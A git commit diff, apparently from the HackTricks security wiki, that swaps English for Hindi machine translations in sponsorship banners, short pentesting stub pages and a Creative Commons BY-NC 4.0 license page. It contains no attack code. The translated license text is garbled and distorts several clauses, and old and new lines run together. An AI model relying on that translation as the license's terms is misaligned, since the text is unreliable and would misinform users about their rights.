Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

This commit is contained in:
Translator 2024-07-18 19:58:30 +00:00
parent 4f81b7b6f8
commit 78ec4f6652
94 changed files with 3431 additions and 3241 deletions

View file

@ -1,30 +1,31 @@
# 1911 - Pentesting fox # 1911 - पेंटेस्टिंग फॉक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर [**@carlospolopm**](https://twitter.com/carlospolopm) पर **फॉलो करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details> </details>
{% endhint %}
और अधिक सेवाएं: और अधिक सेवाएं:
ubiquiti-discover udp "Ubiquiti Networks Device" ubiquiti-discover udp "Ubiquiti Networks डिवाइस"
dht udp "DHT Nodes" dht udp "DHT नोड्स"
5060 udp sip "SIP/" 5060 udp sip "SIP/"
![](<.gitbook/assets/image (273).png>) ![](<.gitbook/assets/image (273).png>)
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) ![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
InfluxDB InfluxDB
@ -38,16 +39,17 @@ InfluxDB
![](<.gitbook/assets/image (341).png>) ![](<.gitbook/assets/image (341).png>)
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर [**@carlospolopm**](https://twitter.com/carlospolopm) पर **फॉलो करें**.
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
</details> </details>
{% endhint %}

View file

@ -1,13 +1,14 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स **शेयर करें**.
</details> </details>
{% endhint %}

View file

@ -1,60 +1,88 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter पर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें.**
* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
</details> </details>
{% endhint %}
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>कॉपीराइट © Carlos Polop 2021. जहां अन्यथा निर्दिष्ट (पुस्तक में कॉपी की गई बाहरी जानकारी मूल लेखकों की है), <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> पर Carlos Polop द्वारा लिखित पाठ <a href="https://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)</a> के तहत लाइसेंस प्राप्त है।
लाइसेंस: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)<br> <a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="क्रिएटिव कॉमन्स लाइसेंस" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>कॉपीराइट © कार्लोस पोलोप 2021। जहाँ अन्यथा निर्दिष्ट किया गया हो (पुस्तक में कॉपी किए गए बाह्य सूचनाएं मूल लेखकों की संपत्ति है), [**हैक ट्रिक्स**](https://github.com/carlospolop/hacktricks) के लेखक कार्लोस पोलोप द्वारा लाइसेंस दिया गया है अधिकारिक क्रिएटिव कॉमन्स एट्रिब्यूशन-नॉनकमर्शियल 4.0 इंटरनेशनल (सीसी बाई-एनसी 4.0) के तहत।
मानव पठनीय लाइसेंस: https://creativecommons.org/licenses/by-nc/4.0/<br>
लाइसेंस: एट्रिब्यूशन-नॉनकमर्शियल 4.0 इंटरनेशनल (सीसी बाई-एनसी 4.0)<br>
मानव अधिकार लाइसेंस: https://creativecommons.org/licenses/by-nc/4.0/<br>
पूर्ण कानूनी शर्तें: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br> पूर्ण कानूनी शर्तें: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
फॉर्मेटिंग: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br> स्वरूपण: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
## खंड 2 दायरा।
# creative commons a. ___लाइसेंस अनुमति।___
# Attribution-NonCommercial 4.0 International 1. इस सार्वजनिक लाइसेंस की शर्तों और स्थितियों के अधीन, लाइसेंसर यहाँ आपको एक वैश्विक, रॉयल्टी-मुक्त, गैर-सबलाइसेंसेबल, गैर-अनन्य, अप्रत्याशित लाइसेंस प्रदान करता है जिसके अंतर्गत आपको लाइसेंस प्राप्त सामग्री में लाइसेंसिंग अधिकार का प्रयोग करने की अनिवार्य अनुमति है:
Creative Commons Corporation (“Creative Commons”) कोई कानूनी फर्म नहीं है और वह कानूनी सेवाएं या कानूनी सलाह प्रदान नहीं करता है। Creative Commons सार्वजनिक लाइसेंसों का वितरण किसी वकील-ग्राहक या अन्य संबंध का निर्माण नहीं करता है। Creative Commons अपने लाइसेंस और संबंधित जानकारी "जैसी है" आधार पर उपलब्ध कराता है। Creative Commons अपने लाइसेंसों, किसी भी सामग्री जो उनकी शर्तों और शर्तों के तहत लाइसेंस प्राप्त है, या किसी भी संबंधित जानकारी के बारे में कोई वारंटी नहीं देता है। Creative Commons उनके उपयोग से होने वाली किसी भी क्षति के लिए सभी दायित्वों से इनकार करता है। A. केवल गैर-वाणिज्यिक उद्देश्यों के लिए, पूरी या अंशदारी लाइसेंसिंग सामग्री को पुनर्उत्पादित और साझा करना; और
## Creative Commons Public Licenses का उपयोग करना B. गैर-वाणिज्यिक उद्देश्यों के लिए सिर्फ उत्पादित, पुनर्उत्पादित और साझा किया गया सामग्री को साझा करना।
Creative Commons सार्वजनिक लाइसेंस एक मानक सेट प्रदान करते हैं जिसे रचनाकार और अन्य अधिकार धारक कॉपीराइट और कुछ अन्य अधिकारों द्वारा संरक्षित सामग्री को साझा करने के लिए उपयोग कर सकते हैं। निम्नलिखित विचार केवल सूचनात्मक उद्देश्यों के लिए हैं, समाप्त नहीं हैं, और हमारे लाइसेंसों का हिस्सा नहीं बनते हैं 2. __अपवाद और सीमाएँ।__ स्पष्टता के लिए, जहाँ अपवाद और सीमाएँ आपके उपयोग पर लागू होती हैं, इस सार्वजनिक लाइसेंस का अनुपालन नहीं होता है, और आपको इसकी शर्तों और स्थितियों का पालन करने की आवश्यकता नहीं है
* __लाइसेंस देने वालों के लिए विचार:__ हमारे सार्वजनिक लाइसेंस उन लोगों द्वारा उपयोग के लिए इरादा हैं जो सामग्री को कॉपीराइट और कुछ अन्य अधिकारों द्वारा अन्यथा प्रतिबंधित तरीकों में उपयोग करने के लिए सार्वजनिक अनुमति देने के लिए अधिकृत हैं। हमारे लाइसेंस अपरिवर्तनीय हैं। लाइसेंस देने वालों को इसे लागू करने से पहले वे चुने गए लाइसेंस की शर्तों और शर्तों को पढ़ना और समझना चाहिए। लाइसेंस देने वालों को यह भी सुनिश्चित करना चाहिए कि वे हमारे लाइसेंस लागू करने से पहले सभी आवश्यक अधिकारों को सुरक्षित करें ताकि सार्वजनिक रूप से सामग्री का पुन: उपयोग कर सकें। लाइसेंस देने वालों को उस सामग्री को स्पष्ट रूप से चिह्नित करना चाहिए जो लाइसेंस के अधीन नहीं है। इसमें अन्य CC-लाइसेंस प्राप्त सामग्री, या कॉपीराइट के अपवाद या सीमा के तहत उपयोग की गई सामग्री शामिल है। [लाइसेंस देने वालों के लिए अधिक विचार](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). 3. __अवधि।__ इस सार्वजनिक लाइसेंस की अवधि खंड 6(a) में निर्दिष्ट की गई है।
* __सार्वजनिक के लिए विचार:__ हमारे सार्वजनिक लाइसेंसों में से एक का उपयोग करके, एक लाइसेंस देने वाला सार्वजनिक को निर्दिष्ट शर्तों और शर्तों के तहत लाइसेंस प्राप्त सामग्री का उपयोग करने की अनुमति देता है। यदि किसी भी कारण से लाइसेंस देने वाले की अनुमति आवश्यक नहीं है–उदाहरण के लिए, कॉपीराइट के किसी भी लागू अपवाद या सीमा के कारण–तो वह उपयोग लाइसेंस द्वारा विनियमित नहीं है। हमारे लाइसेंस केवल कॉपीराइट और कुछ अन्य अधिकारों के तहत अनुमतियां प्रदान करते हैं जिन्हें लाइसेंस देने वाला अनुदान देने का अधिकार रखता है। लाइसेंस प्राप्त सामग्री का उपयोग अन्य कारणों से भी प्रतिबंधित हो सकता है, जिसमें यह भी शामिल है कि अन्य लोगों के पास सामग्री में कॉपीराइट या अन्य अधिकार हो सकते हैं। एक लाइसेंस देने वाला विशेष अनुरोध कर सकता है, जैसे कि सभी परिवर्तनों को चिह्नित या वर्णित करने का अनुरोध करना। हालांकि हमारे लाइसेंसों द्वारा आवश्यक नहीं है, आपको उचित होने पर उन अनुरोधों का सम्मान करने की सलाह दी जाती है। [सार्वजनिक के लिए अधिक विचार](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). 4. __मीडिया और प्रारूप; तकनीकी संशोधन अनुमत है।__ लाइसेंसर आपको सभी मीडिया और प्रारूपों में लाइसेंसिंग अधिकार का प्रयोग करने की अनुमति देता है चाहे वे अभी जाने वाले हों या भविष्य में बनाए गए हों, और तकनीकी संशोधन करने की आवश्यकता हो। लाइसेंसर ने यह अधिकार वापस लेने या आपको तकनीकी संशोधन करने से रोकने का कोई अधिकार या अधिकार दावा करने का कोई अधिकार नहीं देने का सहमति दी है। इस सार्वजनिक लाइसेंस के लिए, इस खंड 2(a)(4) द्वारा अधिकृत संशोधन करना कभी भी उत्पादित सामग्री नहीं उत्पन्न करता।
# Creative Commons Attribution-NonCommercial 4.0 International Public License 5. __निचले प्राप्तकर्ता।__
लाइसेंस प्राप्त अधिकारों (नीचे परिभाषित) का अभ्यास करके, आप इस Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License") की शर्तों और शर्तों से बंधे होने के लिए सहमत होते हैं। इस Public License को एक अनुबंध के रूप में व्याख्या की जा सकती है, आपको इन शर्तों और शर्तों की स्वीकृति के विचार में लाइसेंस प्राप्त अधिकार दिए जाते हैं, और लाइसेंस देने वाला आपको इन शर्तों और शर्तों के तहत लाइसेंस प्राप्त सामग्री उपलब्ध कराने से प्राप्त लाभों के विचार में ऐसे अधिकार देता है A. __लाइसेंसर से प्रस्ताव लाइसेंसिंग सामग्री।__ लाइसेंसिंग सामग्री के प्रत्येक प्राप्तकर्ता को स्वचालित रूप से लाइसेंसर से एक प्रस्ताव प्राप्त होता है जिसके अंतर्गत वे इस सार्वजनिक लाइसेंस की शर्तों और स्थितियों के अनुसार लाइसेंसिंग अधिकार का प्रयोग कर सकते हैं
## धारा 1 परिभाषाएँ B. __कोई निचले प्रतिबंध नहीं।__ यदि आप लाइसेंसिंग सामग्री का प्रयोग करने वाले किसी प्राप्तकर्ता के द्वारा लाइसेंसिंग अधिकार का प्रयोग करने में रोक लगाते हैं, तो आप किसी भी अतिरिक्त या विभिन्न शर्तों या स्थितियों का प्रस्ताव नहीं कर सकते
a. __अनुकूलित सामग्री__ का अर्थ है कॉपीराइट और समान अधिकारों के अधीन सामग्री जो लाइसेंस प्राप्त सामग्री से व्युत्पन्न होती है या उसके आधार पर होती है 6. __कोई समर्थन नहीं।__ इस सार्वजनिक लाइसेंस में कुछ भी नहीं है जो यह सिद्ध करने या इसे इस सार्वजनिक लाइसेंस के अंतर्गत आपका उपयोग, या लाइसेंसर या अन्य व्यक्ति जिन्हें धारात्मक रूप से प्राप्त किया जाता है, से जुड़ा है, या समर्थित, या आधिकृत रूप से दिया गया है, के साथ जोड़ सकता है।
b. ___अन्य अधिकार।___
1. नैतिक अधिकार, जैसे सत्यापन का अधिकार, इस सार्वजनिक लाइसेंस के अंतर्गत लाइसेंस नहीं हैं, न कि प्रचार, गोपनीयता, और/या अन्य समकक्ष व्यक्तित्व अधिकार; हालांकि, जितना संभव हो, लाइसेंसर ने ऐसे अधिकारों का असर न करने या अनुसार करने के लिए जो लाइसेंसर द्वारा धारित किए जाते हैं, उस सीमा तक आपको अनुमति देने या अनुसार करने की सहमति दी है, लेकिन अन्यथा नहीं।
2. पेटेंट और ट्रेडमार्क अधिकार इस सार्वजनिक लाइसेंस के अंतर्गत लाइसेंस नहीं हैं।
3. जितना संभव हो, लाइसेंसर ने आपसे लाइसेंसिंग अधिकार का प्रयोग करने के लिए आपसे राजस्व वसूलने का कोई अधिकार नहीं है, सीधे या किसी भी स्वेच्छिक या वायव्यक्तिक लाइसेंसिंग योजना के तहत किसी संग्रहण समिति के माध्यम से। अन्य सभी मामलों में लाइसेंसर व्यक्तिगत उद्देश्यों के लिए लाइसेंसिंग सामग्री का उपयोग किया जाता है, तो लाइसेंसर व्यक्तिगत रूप से ऐसे राजस्व वसूलने का कोई अधिकार सुरक्षित रखता है, जिसमें शामिल है जब लाइसेंसिंग सामग्री का गैर-वाणिज्यिक उद्देश्यों के लिए उपयोग किया जाता है।
## खंड 7 - अन्य शर्तें और नियम।
a. लाइसेंसदाता को आप द्वारा संचारित किसी भी अतिरिक्त या विभिन्न शर्तों या नियमों से बाँधा नहीं जाएगा जब तक व्यक्तिगत रूप से सहमति न हो।
b. लाइसेंस प्राप्त सामग्री के बारे में किसी भी व्यवस्थाओं, समझौतों या समझौतों के बारे में जो इसमें उल्लिखित नहीं हैं, वे इस सार्वजनिक लाइसेंस के नियमों और शर्तों से अलग हैं।
## खंड 8 - व्याख्या।
a. स्पष्टीकरण के लिए, यह सार्वजनिक लाइसेंस किसी भी लाइसेंस प्राप्त सामग्री के किसी भी उपयोग पर किसी अनुमति के बिना किया जा सकता है, नहीं करेगा, और नहीं व्याख्या किया जाएगा।
b. जितना संभव हो, यदि इस सार्वजनिक लाइसेंस का कोई प्रावधान अमान्य माना जाता है, तो इसे इसे कार्यान्वित करने के लिए आवश्यक न्यूनतम सीमा तक स्वचालित रूप से सुधारा जाएगा। यदि प्रावधान को सुधारा नहीं जा सकता है, तो यह सार्वजनिक लाइसेंस से अलग कर दिया जाएगा बिना बाकी नियमों और शर्तों की कार्यान्वितता पर कोई प्रभाव डाले।
c. इस सार्वजनिक लाइसेंस का कोई भी शर्त या नियम माफ़ नहीं किया जाएगा और कोई भी अवहेलना की अनुमति नहीं दी जाएगी जब तक लाइसेंसदाता द्वारा स्पष्ट रूप से सहमति न हो।
d. इस सार्वजनिक लाइसेंस में कुछ भी नहीं है जो लाइसेंसदाता या आप पर लागू होने वाली किसी भी विशेषाधिकार और शासनाधिकारों की किसी सीमा के रूप में या इससे विवादित रूप से व्याख्या की जा सकती है।
``` ```
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
``` ```
{% hint style="success" %}
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)
**जीसीपी हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
</details> </details>
{% endhint %}

View file

@ -1,51 +1,53 @@
# Android Forensics # एंड्रॉइड फोरेंसिक्स
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें द्वारा पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
